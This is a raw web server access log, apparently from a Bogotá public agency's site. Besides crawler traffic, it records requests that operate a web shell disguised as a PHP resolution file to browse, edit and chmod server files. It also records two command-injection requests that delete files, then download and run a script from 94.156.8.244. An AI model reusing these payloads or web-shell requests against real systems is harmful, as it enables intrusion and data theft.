47.128.18.73 - - [09/May/2024:06:47:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.18.73 - - [09/May/2024:06:47:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.18.73 - - [09/May/2024:06:47:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.18.73 - - [09/May/2024:06:47:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.18.73 - - [09/May/2024:06:47:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.18.73 - - [09/May/2024:06:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.18.73 - - [09/May/2024:06:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.18.73 - - [09/May/2024:06:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
216.244.66.195 - - [09/May/2024:06:47:03 -0500] "GET /BLA/resoluciones/AUTOS%202018/2633.pdf HTTP/1.1" 200 2750459
47.128.97.178 - - [09/May/2024:06:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE%5C&f=basic.pnc.info&ft=info HTTP/1.1" 200 3768
47.128.97.178 - - [09/May/2024:06:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.97.178 - - [09/May/2024:06:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_info HTTP/1.1" 200 1034
216.244.66.195 - - [09/May/2024:06:47:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/3278.pdf HTTP/1.1" 200 278222
47.128.123.67 - - [09/May/2024:06:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.67 - - [09/May/2024:06:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.67 - - [09/May/2024:06:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.123.67 - - [09/May/2024:06:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.67 - - [09/May/2024:06:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.67 - - [09/May/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.67 - - [09/May/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.67 - - [09/May/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.123.67 - - [09/May/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.123.67 - - [09/May/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [09/May/2024:06:48:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61a2f1337561a42fa9f7ee58a022b14f9.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [09/May/2024:06:48:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.61.185 - - [09/May/2024:06:48:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=page78.swf HTTP/1.1" 200 2742
216.244.66.195 - - [09/May/2024:06:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/0845.pdf HTTP/1.1" 200 343613
47.128.123.67 - - [09/May/2024:06:47:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4220.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 605910
47.128.33.48 - - [09/May/2024:06:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=pmdict3.pmh&ft=notepad&white=1 HTTP/1.1" 200 138
201.245.192.253 - - [09/May/2024:06:48:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69b4b1609f19d4e7eb2d2d1c5b0af5253.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.76 - - [09/May/2024:06:48:35 -0500] "GET /alexandra-neuto-una-mujer-que-promueve-la-seguridad-alimentaria-y-el-tejido-social-a-traves-de-huertas.html HTTP/1.1" 200 1075
216.244.66.195 - - [09/May/2024:06:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202019/1893.pdf HTTP/1.1" 200 305537
47.128.28.30 - - [09/May/2024:06:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cfiles%5C&f=guia_cosmeticos-aseo.pdf HTTP/1.1" 200 3035
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.28.30 - - [09/May/2024:06:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.28.30 - - [09/May/2024:06:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.28.30 - - [09/May/2024:06:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.28.30 - - [09/May/2024:06:49:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [09/May/2024:06:49:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.61.160 - - [09/May/2024:06:49:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Cmailtodisk%5Csupport&f=. HTTP/1.1" 200 2849
216.244.66.195 - - [09/May/2024:06:49:10 -0500] "GET /BLA/resoluciones/AUTOS%202019/2009.pdf HTTP/1.1" 200 328782
152.61.192.232 - - [09/May/2024:06:49:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?REQUEST=GetCapabilities&SERVICE=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [09/May/2024:06:49:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [09/May/2024:06:49:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [09/May/2024:06:49:17 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
172.22.2.4 - - [09/May/2024:06:49:19 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [09/May/2024:06:49:19 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [09/May/2024:06:47:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.27.195 - - [09/May/2024:06:49:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=menu.php&ft=info HTTP/1.1" 200 10565
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.27.195 - - [09/May/2024:06:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
216.244.66.195 - - [09/May/2024:06:49:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/2256.pdf HTTP/1.1" 200 350434
47.128.118.101 - - [09/May/2024:06:49:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page67_thumbnail.jpg HTTP/1.1" 200 2901
201.245.192.253 - - [09/May/2024:06:50:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61a2f1337561a42fa9f7ee58a022b14f9.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.118.123 - - [09/May/2024:06:50:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cocr2%5C HTTP/1.1" 200 3747
201.245.192.253 - - [09/May/2024:06:50:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [09/May/2024:06:50:04 -0500] "GET /BLA/resoluciones/AUTOS%202019/2446.pdf HTTP/1.1" 200 900879
172.22.2.4 - - [09/May/2024:06:48:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
47.128.111.99 - - [09/May/2024:06:50:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=C%3A%5Cdmz%5Csrc%5Cxampp-control-panel%5Cgfx&f=cross.bmp HTTP/1.1" 200 2876
172.22.2.4 - - [09/May/2024:06:49:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [09/May/2024:06:50:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69b4b1609f19d4e7eb2d2d1c5b0af5253.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [09/May/2024:06:50:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 31338
47.128.41.49 - - [09/May/2024:06:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=sql&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages%5C HTTP/1.1" 200 3075
66.249.66.19 - - [09/May/2024:06:50:42 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 529599
216.244.66.195 - - [09/May/2024:06:50:44 -0500] "GET /BLA/resoluciones/AUTOS%202019/2556.pdf HTTP/1.1" 200 256663
66.249.66.21 - - [09/May/2024:06:50:59 -0500] "GET /Publicaciones/2024EE81146.pdf HTTP/1.1" 404 227
47.128.40.166 - - [09/May/2024:06:51:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page43.swf&ft=edit HTTP/1.1" 200 3104
47.128.40.166 - - [09/May/2024:06:51:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.40.166 - - [09/May/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
201.245.192.253 - - [09/May/2024:06:51:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.13.238 - - [09/May/2024:06:51:11 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/xeQX2hMfdvWplnJB6KetWr06dHb/5o1NM0mAWu65I63VILVJO6w/u&y=U2FsdGVkX19mc7oH9LfT0FKA48Zppx5jHO7vLi/NAZ3mCeK8u5evCwtSJhzdMV+R HTTP/1.1" 200 30
186.102.13.238 - - [09/May/2024:06:51:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/bvguTTwSLJOsRTTpxaKgfIBKT4VaOiOEFdLpnvWQOPrZqUi+jFf71zJ3GCbx2RZhRtG9thi/I/CqXUNqKLwSxYZZUt1ku2Zs=&u=U2FsdGVkX19u1h2hMlr9cZ7ICkVpi2NzMY+kiTE3Xd6w7KWytCxG3dLpjyR+/pKM&y=U2FsdGVkX19mc7oH9LfT0FKA48Zppx5jHO7vLi/NAZ3mCeK8u5evCwtSJhzdMV+R HTTP/1.1" 200 97
186.102.13.238 - - [09/May/2024:06:51:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/iXGdVyBe9MF74eNjhOHerUa4KB3fJqop2EaCdSWp8gC+cU4/WAuXIFPTXQk4A1ZxTVbxo/ODCB4qwXM7kUc1CiGY0en28850y0btUXwkVimuWwQgtwccLz0klSagnEFdHxQBAZNbepPsCzY6lEy/6cPm6jyJcavTwxqwVGCu/MyupYrTdPVefBKqJ6vS1ci+n6It11v65WeEWH8gA4z/e9OAlSZ059LNrLop3x4zjOANwSqxFDyy6F+wnCGj+xjzkWFrSof24GCXKOPNmkE2gfDWjJf17kBBJOgld5aAOdtkkfUyU4QpO1kgXW6CDIvmfjFIdm9JDbMGCgeXGFjwW+JtKbHwUKvIO0btivUcyV9tkhldFJMnVXeYcTzp5+eJJaLtW2MEVRri31Na+wRsiPjkqg9AC5Aq+4Q+UzgolovWqN8WsoeaaFRIlSeHjX+KfU8RAUT9PSz8BbU4RUvTksNwe7FB6xjiqLpsXGA7M6p7pc4UHvGTgQIEH0jDyp4D8qnBFCCi69f1dV9C5/IvVXaTEdtr2oOVXzitlApFpX7AAwdtIcVvAswdznpJ0ekD2opEIDMiaxm6RwUyOKcH5IaD2B6ZPHhWKIBs5kYnLF5PAWJQRKe9ABh5+Oth5oybK6nI/5nVpq3QRrdL1cOmQfkYsaLnzSQSNdg2NSTNmOEar0asM02703wS8ILvg2fRJJai55J4I7wGVQDdXzVBbVNSsxaqpZarKDiJxmSYZJnDYxcnn0lW52sKqN60UJ9FAcBxn1REXhEWA4tKOxKuSh/lQXH8a3RJQYzEd9/z5xulUZHkooglOKfZVebibCrnl3w602+g/HYjwLdJ+OjM3ewh6lrJ2laaIopOeXoUPlvzjCmWOr03S9Xesv7glrsKzz1T30N4FtQu6c9pHtVlfGRaMVgOdEsHe5oxJOyECGiTPLhmIUVjc5xuUpoxYJe2SEohXiL/elzBcWjORp9e1/oBKzosboM7PYodC7/kvUOgco+h4470k18XT20BfHI3jF2Byi5eJkxxlDYbIrNY8Qx7Gtp+R5iNTFCOzQ7JMHckd2rx9H4SfllTT60DpdTbl4S73saOTYd2SgCPbY3ifnR4wpnygqFR2LMPFZQqbz5CwVPlJdkxBGeOkYLX0iUkDRXE4Gm8DWWSc4NDlSeYmdDHFNjmYki3bELsTs8KX1dLhfJd2iCVdnwDBgnC4whZl26uHAGe84Vw6lnihozkuJeZuBjfS2UNM6N/ZvC3tZn97JfmUfimXg4XkJTjsHpMO0XGke1bFt/pTR/ayFBtH/S/uko4WBcPhD9Efx6h+3z39xcaw0CHbz+cFPgAEFKtC9VQwPXbkNHYiKrO6dixa53EpXW/lBgKplkjAGG65de/vr4XQNapjwqcdc62Kzi4fCIZcN8JJfjdZv05XNGxKScGOUFJ5lDwvL5YmyhogSkGUxd3riTVqtvHdR4MYe3B2iNzMhAkRZKsX5Wfh38PRPtjARnRNKfahx57xp2c5+DNOw9QHVrQkOAzKeP+QvUJJy9C5ypJX2PIXW1RfHNvoBQCnU/Rt+f+8Fz1UkUlo+g+cpeXimRTRtUeHW5izRJcKjATITRBKZGNSlln2cqebYBj+dZQKUeM0aJLAVOv/3kYEHO463Hn+ZluF/Ra3IFnTvC2aI+oy0n1a+Sb/NelR1ZQ/Avr+S+OTZK1x7Qt4SahwBI0XnE2Cz0/H+AkH9cgnqpdsm+qBu6XkfnfZHlJfdoVEEqmNARE2E8OHOs2+uRE6vivQMpsf&u=U2FsdGVkX19u1h2hMlr9cZ7ICkVpi2NzMY+kiTE3Xd6w7KWytCxG3dLpjyR+/pKM&y=U2FsdGVkX19mc7oH9LfT0FKA48Zppx5jHO7vLi/NAZ3mCeK8u5evCwtSJhzdMV+R HTTP/1.1" 200 72
186.102.13.238 - - [09/May/2024:06:51:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Q2tdDcBu1yWTxtGEyjHh6zc1PyRJWTudDyv2hHw9au8CClj+c8Kp7kVRFrsKPVH2N6D1t5ZizsyL5GN7piyiTW7piv+4OJwef57v+5GeZ5DX0yPt9/Lud4JZYeUbXjNHReQ20Nx95SXVmDhP/SDdvf+ysNRezzWBTTnaSmy+Pr9C/ISSDm2aK0RxVMtzqIaxVZSoKP7Zv8PIFLJuvDecZkA/bHuyUq2H0WTMmXtrDD8/uydM1SzOtxmuFEqCOHennXAkymn23e5ZjCJyjFLijr38pjQEbR/knyd6TJirmszlliVDAk8qSo+joPro9XjzjzvPDBor25IO9hX7VH2ZJnwj5kZxDsNXVTkSlMLsDuGoNsg8MD3rivHZM57ntOinOUMhTWdykCisr3Y6k6r90DHc3NnIngerMLpbDz5a+pq+tqAfqml/i9d9+eDMaZpRi0i+bXhMmb1Vq5oh7migcdp4B6bdzSvHRCckCiCHdx/L0Pzpj/9KOymsT18c5HqrDgXOxvhxa/xMsqJODjOpdHD9h+zM52nqtqvzSge0F/UFQJu57K1Kf1HNZnIJv6rLIVBK2jqQleav29PtPfimidxNTVU3LTU60cVLlKkv3bGWUiJkketCxxqPnytW0St3hoF5t5bgidkiKSA1XXrf8yffkDYZ4q5BZu1rzY7EbUw9rRVxrFhA/dXKNdDSQ0R/dpyf7tnwLFUN2zss71wT9qu0RJuVVWyEWiK3u3xZk10Bsm5kVp5dJ&u=U2FsdGVkX19u1h2hMlr9cZ7ICkVpi2NzMY+kiTE3Xd6w7KWytCxG3dLpjyR+/pKM&y=U2FsdGVkX19mc7oH9LfT0FKA48Zppx5jHO7vLi/NAZ3mCeK8u5evCwtSJhzdMV+R HTTP/1.1" 200 208
186.102.13.238 - - [09/May/2024:06:51:12 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/xeQX2hMfdvWplnJB6KetWr06dHb/5o1NM0mAWu65I63VILVJO6w/u HTTP/1.1" 200 30244
216.244.66.195 - - [09/May/2024:06:51:15 -0500] "GET /BLA/resoluciones/AUTOS%202019/3399.pdf HTTP/1.1" 200 780757
47.128.50.128 - - [09/May/2024:06:51:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150205-1653-504000.txt&ft=phpsess&white=1 HTTP/1.1" 200 3965
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.50.128 - - [09/May/2024:06:51:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
216.245.221.92 - - [09/May/2024:06:51:35 -0500] "HEAD / HTTP/1.1" 200 -
47.128.40.171 - - [09/May/2024:06:51:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5Ctransformations&f=Text_Plain_Substring.class.php HTTP/1.1" 200 2925
216.244.66.195 - - [09/May/2024:06:51:49 -0500] "GET /BLA/resoluciones/AUTOS%202019/3443.pdf HTTP/1.1" 200 1308151
47.128.40.191 - - [09/May/2024:06:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5C&f=wp-configmall.php&ft=edit&white=1 HTTP/1.1" 200 4749
47.128.40.191 - - [09/May/2024:06:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.40.191 - - [09/May/2024:06:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.40.191 - - [09/May/2024:06:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.40.191 - - [09/May/2024:06:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.40.191 - - [09/May/2024:06:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [09/May/2024:06:52:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61a2f1337561a42fa9f7ee58a022b14f9.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [09/May/2024:06:52:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.235 - - [09/May/2024:06:52:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=sql&d=E%3A%5Cnuevo%5Clicenses%5Cphpmyadmin%5C HTTP/1.1" 200 3041
216.244.66.195 - - [09/May/2024:06:52:21 -0500] "GET /BLA/resoluciones/AUTOS%202019/3824.pdf HTTP/1.1" 200 260474
201.245.192.253 - - [09/May/2024:06:52:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69b4b1609f19d4e7eb2d2d1c5b0af5253.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
181.53.12.168 - - [09/May/2024:06:52:37 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
